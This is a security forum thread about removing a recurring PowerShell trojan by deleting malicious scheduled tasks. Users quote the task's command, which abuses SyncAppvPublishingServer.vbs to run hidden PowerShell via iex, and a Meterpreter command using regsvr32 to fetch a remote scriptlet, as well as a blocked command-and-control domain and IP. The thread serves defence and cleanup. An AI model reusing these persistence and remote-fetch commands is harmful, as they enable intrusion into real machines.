Jump to content

PowerShell/Agent.AEW trojan keeps coming back after cleaning and reboot


Recommended Posts

  • Administrators
5 minutes ago, Shogun1 said:

I have the folder C:\Windows\System32\Tasks in my windows 11 and tried to erase.

I guess, you were saying but couldn't erase it...! My question is; did you mean that folder all of it or I misread that??

Please run scheduler and delete the task Microsoft\Windows\NetService\Network\NetServices

Link to comment
Share on other sites

Posted (edited)

@Marcos, I found an earlier variant of this attack tracking to 10/2021. This one wouldn't require admin privileges. Details posted below. Let's analyze:

1. Attacker created a Logs folder in %LocalAppData% directory. Then he dropped system-logs.txt file there.

2. He then leveraged legit Win system SyncAppvPublishingServer.vbs script to run PowerShell script at task startup time.

Quote

Task: {258116A2-BD82-4698-9403-CE25E42EAEF1} - System32\Tasks\Microsoft\Windows\NetService\Network\NetServices => C:\Windows\System32\SyncAppvPublishingServer.vbs [1720 2019-12-07] (Microsoft Windows -> ) -> "n; $a = Get-Content "C:\Users\User\AppData\Local\logs\system-logs.txt" | Select -Index 17033;iex $a;hackbacktrack XoBJLWeei4NqeQuFneR9fArkoDLpp4Tj+YZu2tRZg3I=

-Log Details-
Protection Event Date: 10/6/21
Protection Event Time: 1:11 PM
Log File: 2b7dad48-26d9-11ec-87a2-bc5ff42b1b34.json

-System Information-
OS: Windows 10 (Build 19042.985)
CPU: x64
File System: NTFS
User: System

-Blocked Website Details-
Malicious Website: 1
, C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Blocked, -1, -1, 0.0.0, ,

-Website Data-
Category: RiskWare
Domain: ai.backend-chat.com
IP Address: 172.67.170.251
Port: 443
Type: Outbound
File: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

  https://forums.malwarebytes.com/topic/279614-riskware-block-aibackend-chat/

EDIT - Per OP's posted Autoruns text:

Quote

+ "\Microsoft\Windows\NetService\Network\NetServices"    ""    "(Verified) "    "c:\windows\system32\syncappvpublishingserver.vbs"    "12/7/2019 5:10 AM"    "0/73"

Appears this bugger has "been flying under the Eset radar" for sometime.

Oh, my. There it is:

https://lolbas-project.github.io/lolbas/Scripts/Syncappvpublishingserver/

https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/md/Syncappvpublishingserver.exe.md

Edited by itman
Link to comment
Share on other sites

Posted (edited)

Also came across a Meterpreter remote attack using "Squiblydoo" technique via SyncAppvPublishingServer.vbs.

Quote
SyncAppvPublishingServer.vbs "Break; regsvr32 /s /n /u /i:http://192.168.254.158:8080/jnQl1FJ.sct scrobj.dll"

indirect-command-execution-syncappvpubli SyncAppvPublishingServer – Regsvr32 indirect-command-execution-syncappvpubli

SyncAppvPublishingServer – Meterpreter via Regsvr32

 

https://pentestlab.blog/tag/syncappvpublishingserver/

Edited by itman
Link to comment
Share on other sites

11 hours ago, Marcos said:

Please run scheduler and delete the task Microsoft\Windows\NetService\Network\NetServices

Hey there Marcos,

 

I found C:\Windows\System32\Tasks\Microsoft\Windows\NetService\Network

but there is no file or a folder called \NetServices after \Network

it is empty or hidden ..! What should I do in this case??

 

Regards,

Link to comment
Share on other sites

12 hours ago, Shogun1 said:

I found C:\Windows\System32\Tasks\Microsoft\Windows\NetService\Network

but there is no file or a folder called \NetServices after \Network

it is empty or hidden ..! What should I do in this case??

Open Windows Task Scheduler. Then open Task Scheduler Library folder.

Perform the following:

1. Open Microsoft folder.

2. Open Windows folder.

Navigate downward until NetService folder is found. Open NetService folder. Take a screen shot of what is displayed and attach it to your next reply.

Link to comment
Share on other sites

14 minutes ago, Shogun1 said:

Here is the screenshot of what you asked,

Repeat the same procedure. Right mouse click on NetServices and then select delete. At this point, this scheduled task should no longer run at system startup time.

Link to comment
Share on other sites

3 minutes ago, itman said:

Repeat the same procedure. Right mouse click on NetServices and then select delete. At this point, this scheduled task should no longer run at system startup time.

Done and deleted it from 1 laptop and will perform the same thing on my other 2 laptops as well to see what's new!

 

Please standby for my future replies next move :)

Link to comment
Share on other sites

@itman,

 

Your trick worked and notification has gone completely but I have ESET Staff asking me for more info and further investigation to determine whether I have malware infection or not..!

 

Thanks for your time and help dude,

 

Link to comment
Share on other sites

  • ESET Staff

I assisted Shogun1 with some more cleanup.  There were 2 other scheduled tasks which used the same lolbin trick.  Not uncommon for these powershell scheduled tasks to leverage multiple scheduled tasks to increase their persistence.  Samples of everything have been gathered and submitted.

Link to comment
Share on other sites

  • 1 month later...
On 5/6/2022 at 2:42 AM, JamesR said:

I assisted Shogun1 with some more cleanup.  There were 2 other scheduled tasks which used the same lolbin trick.  Not uncommon for these powershell scheduled tasks to leverage multiple scheduled tasks to increase their persistence.  Samples of everything have been gathered and submitted.

Hi, can you be kind and look at this thread https://forum.eset.com/topic/32653-annoying-powershellagentaew-on-each-start-need-assitence/#comment-152054

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...